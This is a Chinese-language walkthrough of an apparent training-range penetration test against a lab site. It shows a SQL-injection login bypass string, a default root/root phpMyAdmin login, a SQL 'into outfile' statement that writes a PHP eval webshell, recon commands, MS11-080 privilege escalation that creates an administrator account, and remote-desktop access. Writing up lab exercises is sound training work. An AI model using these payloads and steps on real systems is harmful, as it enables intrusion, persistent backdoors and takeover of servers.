DMZ靶场渗透

0x00 目标站点www.test.ichunqiu

 

0x01 尝试登陆系统

-尝试弱密码登陆

结果：forbidden！！！

-尝试万能账号密码登陆

1‘ or 1=1--+ 和 1‘ or 1=1--+

结果：forbidden！！！

从登陆入口得不到其他更多的有效信息，所以从其他地方找突破口

0x02 使用御剑后台扫描工具对站点进行扫面

-开始扫描

 

-扫描得到一条目录信息：http://www.test.ichunqiu/phpmyadmin/

 

-打开扫描出来的链接，发现是phpmyadmin数据库管理程序

 

0x03 新的突破口：phpmyadmin

-得到phpmyadmin的登陆入口，当然就是想办法登陆进phpmyadmin系统

-尝试使用默认账号密码root/root进行登陆

 

-成功登陆进系统

-既然登陆进了phpmyadmin数据库的web管理页面，那也就相当于可以任意的查看整个数据库的内容，所以，尝试在数据库中去找到刚才想要登陆的系统的账号密码

-结果发现：当前web应用程序使用的数据库是个空数据库

 

0x04 利用sql语句写入webshell

-既然从数据库里面找不到登陆进后台管理页面的账号密码，所以只能从phpmyadmin提供的功能入手

-执行sql语句：select @@basedir  查询当前数据库所在的目录

-得到目录在：c:/phpstudy/mysql

 

-根据得到的数据库所在路径可以猜测，整个网站所在的根目录的路径是：C:/phpstudy/www

-既然猜测到了网站的根目录，那么尝试利用sql语句往网站根目录下写入一句话的webshell

-构造的sql语句： select “<?php eval($_POST[‘pass’])?>” into outfile “c:\\phpstudy\\www\\shell.php”

 

-成功写入webshell

0x05 使用菜刀连接webshell

 

-成功连接上：getshell

 

0x06 提权之前的信息收集

--获取主机名：
-hosname

--获取所属域信息：
-systeminfo
 

--获取系统补丁情况
-wmic qfe list   获取失败，没有权限，但是通过前面的system也能大致了解系统补丁安装情况
 

--获取本地用户组：
-net localgroup

--获取本地用户
-net user
 

--获取本地管理员信息：
-net localgroup administrators

0x07 利用exp：ms11080 获取系统管理员权限

根据前面对系统信息的收集和判断，在当前系统利用ms11080.exe来提升系统权限，使我们获得一个管理员权限的账户
-将ms11080上传至服务器的一个可读写的目录
 

-执行ms11080.exe（这个exp是一个不支持自定义命令参数的）

-成功执行exp，创建了一个具有administrator权限的90sec的管理员账户

 

0x08 利用新建的管理员账户90sec通过3389端口远程登陆进目标系统

-打开mstsc程序
 

-连接目标主机
 

-登陆目标主机

-成功通过远程桌面连接目标系统